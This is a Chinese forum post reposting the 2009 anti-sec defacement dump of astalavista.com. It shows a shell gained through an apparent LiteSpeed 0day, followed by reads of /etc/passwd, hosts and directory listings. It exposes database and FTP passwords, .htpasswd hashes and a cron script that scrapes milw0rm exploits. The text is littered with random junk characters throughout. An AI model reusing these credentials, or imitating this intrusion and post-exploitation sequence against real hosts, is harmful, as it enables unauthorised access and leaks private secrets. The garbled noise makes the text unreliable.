里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。! B; |: r( x* |$ v; z+ C3 `: x) _
, K' H L, z4 _- d
[root@front3 ~]# curl -I litespeedtech.com
1 A' \# A# W% F; c+ xHTTP/1.1 200 OK( W" u& y2 ^' S/ `9 h. D n* n& h; v
Date: Fri, 05 Jun 2009 22:54:51 GMT: C8 i ~: @8 |$ A: z
Server: LiteSpeed/ f/ K" U/ j+ ]( @, G# ^
, o4 t0 t- r5 {, @另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-. O+ R2 s. ]: u3 g% Y. Q- \
( Q/ e3 F* B- ?: n
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
' I) H5 }6 ?. i7 l( z3 P# d. c! h4 F ~, x9 F9 H; P# A
8 x$ m2 t8 O/ b$ |- ]& r. Q7 R" C
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ # Z5 q3 O& n& o' |" \/ E
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
" |! C9 s3 u* V/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \9 V; b' u8 x3 N, H" f
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /' G3 U! r. [9 p6 }
\/ \/ \/ \/ \/ \/ \/1 ^+ h' Z* f% L* j- ?1 f" A4 o
The Hacking & Security Community
4 ~/ x: n2 w# v1 A; z) G[+] Founded in 1997 by a hacker computer enthusiast& z7 M5 c* Q) Y0 H) x* U; O: V9 }! K
[-] Exposed in 2009 by anti-sec group) @( Y9 t# g' U9 C/ k8 X
! V6 w( i7 }, B, ~
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
2 _$ K1 i9 ^. u* s8 ~) A" F>> 03. Who’s behind the site?
' l5 w6 ]* N1 l) `! O>>3 W0 s7 F5 K) m$ D; w3 \. e7 H
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
# m& h& R( }( W& M
' p0 f" i5 Y+ N2 K" R9 e>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
9 {2 \' O0 M/ J>>4 b- ?7 H2 e5 D# d8 o& I
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
% E6 m$ ]5 P. [+ d5 h: }& N8 _3 Rmilitary institutions.
9 s0 a! h; C a# a1 x3 B>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.7 J; P' ^2 r s* N7 V$ z0 B) W
1 M3 s9 X4 E. ~4 i7 \; d# c* _
Why has Astalavista been targeted?4 b& q* k; s) H; y, s1 e
% e0 b( _8 p% a" bOther than the fact that they are not doing any of this for the “community” but
3 \: W8 ^# h: N0 R. [/ a! Ifor the money, they spread exploits for kids, claim to be a security community
' r0 P% ?. X {" o(with no real sense of security on their own servers), and they charge you $6.66
$ C6 P/ q$ m0 X! [. K% m: {( U0 y2 Aper months to access a dead forum with a directory filled with public releases
3 j# d' D1 S! U3 qand outdated / broken services.9 L5 n( O4 y5 Q% p
Q) x4 Z& g3 a1 ~( o+ M) y
We wanted to see how good that “team of security and IT professionals” really is.
8 x- h) H3 |) t( j6 Z1 w; D, o' v% f8 ]/ X! c& s
Let’s begin.& \: p8 J0 P; f) D, c) g
& v& `6 k' L) t$ Fanti-sec:~# ./g0tshell astalavista.com -p 80, R' k1 w- p z* ]7 N X8 J. V
[+] Connecting to astalavista.com:80
- x) H2 \. N+ u+ M[+] Grabbing banner…7 Q% B+ I9 L, e! H' Q( l
LiteSpeed, u0 r2 w/ [, @8 M6 L
[+] Injecting shellcode…
- ~( h6 Z" B) M9 b$ z[-] Wait for it
5 I# ~( ~$ c% d4 a+ w9 W3 k3 x, E! h1 w: L v" D0 ~
[~] We g0tshell
, y) Y( q# H" p; h- Q' kuname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux! n" k) L$ L' E3 | J
ID: uid=100(apache) gid=500(apache) groups=500(apache)5 }7 \, L4 M& U) v6 a6 s% e) M" F# g# g
) h. f1 e! z( U' T, a6 Xsh-3.2$ cat /etc/passwd
% d* C2 l+ M' z$ h& q* ]+ f% Q8 Uroot:x:0:0:root:/root:/bin/bash8 G- Z, ^0 i' X3 f, x
bin:x:1:1:bin:/bin:/sbin/nologin2 V2 `1 ?* [& T o% b( t* {, h
daemon:x:2:2:daemon:/sbin:/sbin/nologin% y4 o: b$ `0 z2 F: E5 s
adm:x:3:4:adm:/var/adm:/sbin/nologin
, g, Q" l( m- Y2 W3 H1 r1 clp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
& S4 E. _# k* q- s3 R/ dsync:x:5:0:sync:/sbin:/bin/sync9 O; x7 Z1 n9 N$ J' ?
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown9 w+ Q6 i8 j' s8 M+ G; i
halt:x:7:0:halt:/sbin:/sbin/halt+ o n2 D! t) s; s7 x
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
1 k* @; o7 h1 H$ Y8 Znews:x:9:13:news:/etc/news:
% R" K0 S: c/ Q5 r* j: auucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
6 @6 @) h F0 O* t; |" toperator:x:11:0perator:/root:/sbin/nologin( m* v3 w$ b3 n+ f% o* F }9 L
games:x:12:100:games:/usr/games:/sbin/nologin1 I, o3 [4 ?; I w0 o C4 \
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin4 y" R3 w$ y; M5 e8 a
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin7 f/ ` |! x- \8 d0 y
nobody:x:99:99:Nobody:/:/sbin/nologin
F% D% j* `& t! N4 Orpm:x:37:37::/var/lib/rpm:/sbin/nologin
- i/ H9 f# A9 n8 L4 ]! Adbus:x:81:81:System message bus:/:/sbin/nologin
6 E- N+ A8 [8 g) bnscd:x:28:28:NSCD Daemon:/:/sbin/nologin
- H9 v' b. b: W& }. F' K$ [" U8 Rmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin, a$ a% h3 U, J3 X2 b2 E7 y
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin V. `0 L3 T* @ Z7 W6 Y& b$ B1 b
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin1 I S# I# D7 M9 I1 H2 ~9 F
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
t q0 @; l' s7 p6 Zrpc:x:32:32ortmapper RPC user:/:/sbin/nologin
z( L% u' m; l' f4 B( Krpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
8 a+ ?1 t7 z; k* [0 y0 {nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin2 g2 [3 z+ r, E
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin; ~, t, e5 A( A) f" i
pcap:x:77:77::/var/arpwatch:/sbin/nologin
1 b/ E7 R, ]; a8 i6 Wnamed:x:25:25:Named:/var/named:/sbin/nologin5 U& O! _! F" r" s( `! ? _/ R
apache:x:100:500::/var/www:/bin/false
! b4 ^, o0 q1 |- @! t4 g* ?6 bdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
5 n( d- Z* L: C) q& o/ f+ Kmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
- S8 p# }8 V }8 fwebapps:x:500:501::/var/www/html:/bin/bash
& E( R$ J# Q$ T4 ymajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
. M( M @# Y6 [2 Y3 c5 j) c& l; Ladmin:x:501:502::/home/admin:/bin/bash! }3 ^" d$ t9 E/ g/ T3 ?* B
jon:x:502:503::/home/jon:/bin/bash
4 n+ ?7 X. D' g c$ C2 M! Ecom:x:503:504::/home/com:/bin/bash) w# o; z1 B. R/ N
ntp:x:38:38::/etc/ntp:/sbin/nologin
* u D( \+ b. Lais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin w8 w$ V [7 ], p
astanet:x:504:505::/home/astanet:/bin/bash$ v+ u) `: C1 t2 b# D7 H
avahi:x:70:70:Avahi daemon:/:/sbin/nologin9 X9 L( r: @% J/ b5 j
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin6 e8 K% B; p! w4 Y
2 u2 h# P. k2 |sh-3.2$ cat /etc/hosts
& A: V3 ~% Z; S1 l0 |4 B8 j" k, V# Do not remove the following line, or various programs4 j4 ?" Q# P6 L0 A+ \
# that require network functionality will fail.. c. N9 u' i2 X# v' A4 W2 T
127.0.0.1 localhost.localdomain localhost
: z8 N; K7 |2 P4 H::1 localhost6.localdomain6 localhost6# ]9 u d6 q r% q2 a- T1 q
80.74.154.172 asta1.astalavistaserver.com" H4 a. s5 m0 ~( {; c
' U' [& u- s) P0 P; Gsh-3.2$ pwd. g. }) G/ X* n1 h1 J, O& [9 y3 d
/home/com/public_html
. S( v! c% Z0 c( p+ W7 l2 P! f8 A8 B% @
sh-3.2$ ls -la; g: L; K! j* ~, j( {2 W
total 184604 P/ D8 u+ a9 K* b. d7 j Q1 Q+ a
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
3 b# f$ C% P e9 h: H: v# s5 d1 [drwx–x–x 11 com com 4096 Jun 25 2008 .. k, j7 e4 p1 Y! ~9 j K
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
) L% j* ^0 F2 Xdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache" }; E: O7 ~4 b$ _4 ?9 T; Z9 `
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
( e3 l# A G T) n Udrwxrwxrwx 2 com com 4096 May 19 00:50 config7 l3 ~2 ~1 ~1 O9 ^3 [/ M% `3 z
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
5 f% d0 o9 G, V% {/ \* I0 Zdrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
y' z* s" c% ddrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing' z% _' h! }& p5 l7 I, _" g0 t
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo/ G! c7 ?! U _
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__7 {& ^" N+ r- J7 i6 K2 e
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
6 Q3 k3 S" R/ e/ \8 i+ R! @drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
) I: ]2 t, [! n! M2 w% Adrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
; ~- l" L) a# d: k2 [. b$ ^-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico! F7 z; w2 ~0 T3 |+ x; |6 P
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed4 h D8 X/ n/ G% s
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
- k1 E2 c0 j3 j s" K7 Z X-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak/ z: m* c7 _' Z& u( N" z* F
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
2 x5 Z* p& |. s5 c6 n+ sdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool5 p$ s: u5 E8 u/ z/ b
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
6 O8 l5 ~7 a( I F" K8 d2 u$ e-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php+ e7 ^& N r1 Q( t( o
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
3 v i1 U6 O$ [& ]6 _; zdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang3 J' M6 T* J/ V2 k' k2 k
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib; b6 O# S+ f. k
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
8 i; f- u/ @5 f4 f: R, C) Qdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
: w- R" t0 C' a" M z4 E& q# cdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
6 `- d4 g) W$ u% \drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
' }+ y9 H0 N. ]) X3 @drwxrwxr-x 22 com com 4096 May 28 17:06 _new6 H3 v8 B* K7 E# J+ V
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old6 ~( d6 M, ~; h) O3 z- ~- [
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy9 @- |, c- n) n1 C3 G g( o* k
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
( J3 w, S/ M; y6 W. ^* Z-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
7 B" A! m, N4 j: i7 [-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml' ~) T' P; c' l: v; b6 |/ G
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php; w+ ?2 p, b3 E, W
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
% z9 r8 n: b8 j# [! }3 Z7 Bdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp1 [0 k- F: x. f3 k' Q, v
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
+ h: e5 [/ V% {( F/ J: w" f) u( F& f4 L; ]: M* r B& s5 S$ h" b
sh-3.2$ head -20 index.php
! }: g8 ?5 c! ^# n<?php! K5 @7 c* t/ ^, }3 m9 L
; o% Z0 I0 g O' z; ]) d/**( ^! `9 ~5 Y4 R
* The main page for the CMS7 y: l t4 `5 G
* @copyright CONTREXX CMS - COMVATION AG5 h2 w6 _4 M* w4 b5 s& a4 V
* @author Comvation Development Team% V* e- ?: f0 G+ V" P: Z# f
* @version v1.0.9.10.1 stable
% F* l2 ~% r3 N( E9 T( P* @package contrexx
" `! F7 G$ c5 y4 H( z- ?5 O4 E* @subpackage core3 t% J+ ^0 s* @/ I- c% M( A
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage4 s; s" ^6 Z) E
* @since v0.0.0.0& P& t; n& o$ V; I
* @todo Capitalize all class names in project7 r# y8 o) h8 J" O4 o
* @uses /config/configuration.php
% L! |7 X4 x8 |' d* @uses /config/settings.php+ o: @- S" v- M* m) a7 t: f3 m
* @uses /config/version.php
7 s3 ~* P3 r3 b4 U4 ]# C* @uses /core/API.php
* ?/ ?( c" A8 K/ w# m& o, v4 l* @uses /core_modules/cache/index.class.php6 n% e0 G- _, Z; ~4 [
* @uses /core/error.class.php
! R% Z. J) O5 M5 a5 G3 Z( r: n8 j* @uses /core_modules/banner/index.class.php5 l" b% x7 O: z4 p+ ]2 m5 E$ v' U
* @uses /core_modules/contact/index.class.php( ~. e2 F+ L1 f N( W3 v+ q" k
4 l6 K( `8 [+ A; Ksh-3.2$ cd config/
9 U- j3 [7 S* [8 l! hsh-3.2$ ls -la9 u# R2 ]$ U% R' u/ H j
total 324 ~, g C+ @% o; o( s
drwxrwxrwx 2 com com 4096 May 19 00:50 .
- ?" G; Q- ]$ M' E0 Y9 s/ \drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
* |. l: o1 w* Q5 Q5 U-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php1 a6 B5 f% R" ?4 C/ [
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php, ?7 y% `6 B; g9 G. i# m, h
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php; Q/ P L. J& T6 y& D H# I
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
" ~& C# _* D+ q% o' I% L+ r/ ?. f! p& s- u1 W; r+ `# m' h8 o
sh-3.2$ cat configuration.php3 K; H! P" r7 Q0 P9 _
[snip]
`2 b) L- ]6 i$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
2 z4 f9 N1 W3 d! |$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name# N/ [+ q& C' }$ i8 G* U# T
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix9 J- ^4 w. T7 `, b7 [
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
- m7 C/ [7 k( c7 b$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password3 e9 I5 M7 Q* I+ E2 G
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
2 k" p% U7 K& a9 ?/ Y/ s$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)3 n7 `+ z5 n2 W- R3 I1 a
[snip]
' X( X4 J4 ^) m) M( }, K& M$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
1 h6 _% O/ p$ T' T3 k: T. r$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode- N! E# x0 s3 H+ M: S
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
" e9 L! {# ?% A3 h& B$_FTPCONFIG['port'] = 21; // Ftp remote port
4 Z8 g# c0 ]! A( ^# t$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username- e, }' b2 ^7 z/ g) i) S4 A
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
: U8 A g ^/ u+ \1 Q% y4 W" B$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms( o3 R( b0 t) U8 y# C; D
" s, [3 x, P* d: ]- l+ t
sh-3.2$ cd ..
) H9 W/ _$ w1 |2 E2 }+ fsh-3.2$ cd dvd/
; P, N1 O; G9 K. j' R/ }sh-3.2$ ls -la8 }& m# M0 r. o' y l" {
total 2913780! p8 ^, v, g7 v0 {# b
drwxr-xr-x 2 com com 4096 Sep 9 2008 ." |5 }* }0 v. W+ Y2 ^$ ^9 L
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..9 ? X2 X! O$ J" I) h
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
2 W/ `) F+ g# D- ^$ A- S' {8 R, K" |-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
) o( o- w/ H+ ~6 J! ]-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar. N, d' V* W$ b4 l1 Z$ _( y
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
3 z. f$ u& E E% O1 l9 z$ j$ U8 T. |
sh-3.2$ cat .htaccess
2 j8 M8 Q M6 |8 D2 p. J4 XauthType Basic
" K9 A/ ]# W# m% [( l. oauthName DVD
+ y. q" G$ L9 ?authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd& e+ |7 [, W; E3 k4 G( ] ~
require valid-user
9 U8 i. I2 H N- [3 C# E1 E
- Q( ^2 J2 ]& O! ?" `sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd9 d$ Q. T: W2 e6 R
DVDdownload:CRD8cuY6.MPT6, q3 l8 o% ?* m9 ~
DVDdownload2:CR8a36.wluFMg) S! B# a, |+ w" p
1 a- v7 E u( c8 M) T9 `
sh-3.2$ cat test.php
/ s' }$ B5 c- ]! o5 y* o( V% p<?php' d( y: Z$ e, m- i
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
* G8 w% _! N) W" c* j5 q$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));; V" B) t% V7 L- j+ H
echo $url;2 Q! a9 g. Q6 E7 b7 A# y/ H
?>
0 Z2 {, @' K; ]
^. w4 [- m3 @8 Rsh-3.2$ cd modifications/
8 K( `8 `0 v* }$ Z3 X& e( _sh-3.2$ ls -la
: O* M H8 E' Stotal 32' k+ @* |& e' J* o9 q4 v
drwxr-xr-x 8 com com 4096 May 11 12:48 .% l0 O% R1 [, w" g/ t A
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
) y8 w1 a) N5 G \drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng: N- c: P# Q+ q+ q: E5 f
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
/ |+ X$ g; ]6 m- L+ t+ a, c5 K1 n4 ydrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools9 P( `5 L o( @) ~6 a
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
8 O9 I+ Y5 K7 ]0 Mdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search7 `4 T% ]' N5 m- c9 x) W8 k
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp7 W5 S6 {' L: E: ]4 }. V3 |% a
! Q, S# G& J- D* F- M
sh-3.2$ ls -R/ U9 T% g4 V6 {; Y
.:+ h6 L2 |# o8 [1 k
com_avtng cronjobs onlinetools pjirc search _tmp+ ?3 g. D, f# A6 J) _8 K' A; j
d9 U% @8 v0 p./com_avtng:
( J" G9 ^9 E0 `3 q( Favtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
+ F# V$ S% N A9 w0 o* e6 F; F. `; L. u8 ^1 }$ ]0 S
./com_avtng/scripts:
; }5 I6 o L6 Lpopunder.js2 W& ?/ ~- A0 R! S& }
+ t; D. k5 | q7 A./cronjobs:
0 S, J4 M% D/ W/ W6 Z. L: }( wexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp2 F: E- g, ^% l# e0 }0 m
" V5 m3 K+ f$ X% n./cronjobs/tmp:$ t) B" s& ? W, n. z, _ g9 V' c' D, l) g
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv) a% y8 i3 j8 n: p; |" ^
2 i9 u- q$ q& s
./onlinetools:( z' X: j4 m& W7 Y5 U0 p- a
index.php8 T) p: h2 N6 M$ f) @
0 ]3 ], A1 w4 O/ {5 Z: P./pjirc:4 k. [! }# d* J) m, N! E( ~% E5 L
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt' e8 r3 f3 v6 w4 i0 d1 R8 ^
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
9 W% _5 u! I- {3 _$ x/ ~% R ]- {background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
7 r) P' P: a4 k5 R: S& v1 P# m0 i- h4 ]9 K! f# H# O
./pjirc/img:2 Q; p$ G6 K5 Q3 n9 i* {/ U) N
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
! \3 t( Z/ M5 m# E; m$ X( parbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif 6 T2 e9 N* D0 y6 z4 l+ ~6 {
verre-eau.gif% D7 x$ l% [7 Y) O3 |( P
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif & _- Q* x, N \6 |5 m
verre-vin.gif: Q8 d' F$ ^4 ?( z0 i/ f! G
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif$ o& Z* z+ `! j: Q+ ?1 Q
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
8 P$ L8 R6 u: D w1 l
! t* A% N* G$ J5 l u5 e./pjirc/snd:
& i/ ?/ _6 u* p" y% F6 t* tbell2.au ding.au
I4 A( i2 h S+ }: \! x) j. A1 A! e8 R
./search:
$ r4 l3 Y: l* usearchEngines.php search.php1 n" W' P( B; o7 s
: `$ H, Z2 U' q, u2 W3 |! V
./_tmp:& r- Y; r# q; B6 O$ M
defaultPorts.php defaultPorts.txt; b& H5 ]8 T2 x0 ], A/ H% H9 g: X
, E/ n2 l3 c2 v0 L, L* B
sh-3.2$ cd cronjobs/, X" x2 K( s6 Y7 C8 k1 g( X
sh-3.2$ cat exploits.php
" J7 E7 ]# V/ b1 i2 Y[snip]
5 c3 ?+ }- ~; [$categories = array();
6 ^8 R9 n |7 y$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
7 R( R, f8 ^2 }/ B. O; V- H2 E$expolits = file($milw0rmFile);
. H' C ^9 H: G$comExploits = array();9 V8 j ]0 I6 y; {: j8 B
[snip]
4 l& o v; q8 e; r// manage data0 c( M. G- @, O# A- z- [
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 26405 ^& X% l! m& `8 N( x, K
3 O4 L' y2 }: H& [ // get path and title+ U: N ?# D8 [# K ]
$expolits[$x] = trim($expolits[$x]);! S o, Y6 ~& l6 x1 z) B" w" R1 ^4 O
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
8 T- e8 _' d, r' y- t/ z! } $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
8 O( |6 w5 L; O, y b* g; G
/ V, h2 l" p6 A! v" R, m: F- u Q // check if file exists
. N1 _/ r0 E( F, ?% s, z if (file_exists($path)) {
* G) m5 ]0 v8 Z) U# F, x
- ]+ A% T& m2 D7 f; l6 `& y $text = file_get_contents($path);+ Q) W$ h2 Z n! i$ ^
0 X2 O, Q+ K6 F) l // get content and date
6 t% O/ j/ c# }* T" n& C* s //$text = htmlspecialchars($text, ENT_QUOTES);
1 T N& f+ I, o- W8 r, ?/ N& I $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));* B% N8 d5 ~- i! C5 T T( Y
if ($tmptext != ”) {0 L4 O. k: Y+ K
$text = $tmptext;. l o/ I8 e) |% B
} else {( l: H6 S: O6 c, N: V' m
$text = addslashes(htmlentities($text, ENT_QUOTES));7 E* t" o. X( a* i4 P- u
}6 J5 E% ~* o/ g
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
7 S5 X6 l# o2 B7 _$ i4 _ $tmp = explode('-', $date);
$ q, k0 @- [/ t' }# Z9 L( b2 g $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
) g; J. ?6 o+ Y/ c# D $cat = getCategory ($path);
6 q. s' {5 r3 Z. v $ext = pathinfo(basename($path));# X9 v! i1 D" M5 N$ Z
$ext = $ext['extension'];
( M) a) Q! k1 ^# u( o" L. [ $qStr = ”7 X) U, ^7 r0 ^ b1 c
SELECT `id`
3 {2 u# ~ ^: I/ r FROM `contrexx_module_exploits`' V0 [, S; l* I' _! j
WHERE `title` = ‘” . $title . “‘
# K9 v" t! z) _4 b1 ] AND `date` = ‘” . $date . “‘
2 ~% u* H E- a0 H7 c “;$ H0 z7 _+ q6 C0 H& c
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;' z4 C" {7 ?% N+ K' d1 A4 L4 l
$q = $_objDB->query($qStr);
- Q; k" r! S5 O3 f; Q" _6 \ H" k; [
* N2 G( f+ l- o% e! |; [# K F if ($q->numRows() == 0) {: q! v! H* s: j2 w
@, [# S A3 W; ~7 O! s
// prepare array
/ \1 Q/ j! T/ s0 u, f: n& u) z $comExploits[$x]['date'] = $date;
) h! f. R3 o* w( G0 n' z; ~ $comExploits[$x]['title'] = $title;
. m3 S; X& a, p7 f$ Q/ } $comExploits[$x]['author'] = ‘milw0rm’;
0 K7 H# o5 h0 J% R+ M" m $comExploits[$x]['text'] = $text;
/ U: Z" V% G3 w/ D# B $comExploits[$x]['source'] = $ext;7 T j0 N( w" M$ c0 n. F
$comExploits[$x]['url1'] = ”;# D6 e1 R" ]& Q) t: ^. O
$comExploits[$x]['url2'] = ”;
9 G1 Q5 I6 z- | j $comExploits[$x]['catid'] = $cat;4 O6 [. ]" J/ }0 a$ k
$comExploits[$x]['lang'] = ‘2′;
* e1 U) C9 w: v: @; Z D $comExploits[$x]['userid'] = ‘12′;4 d. y: }& n* v+ k. j, u$ {4 }0 N
$comExploits[$x]['startdate'] = ‘0000-00-00′;
; k; _) T0 x0 n) z3 Z0 K $comExploits[$x]['enddate'] = ‘0000-00-00′;
& T0 V0 u: N; x+ q, n8 O+ C {5 t $comExploits[$x]['status'] = ‘1′;
! M( g) t' t; U/ ^; i4 O $comExploits[$x]['changelog'] = $date;2 ~ p; R! X1 y5 o- N+ j
' Y# v+ [! k: H; [6 k
}! |" p; b% t8 a. O/ P. a! r
[snip]6 i, x( t( `1 O. F% h6 y
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?># b# y/ K# H( ^0 Z
<rss version=”2.0″>" V; ^% Q0 @5 v Y% b3 j+ e
<channel> c9 W5 f1 @& X5 j% }# G$ Q8 X/ `
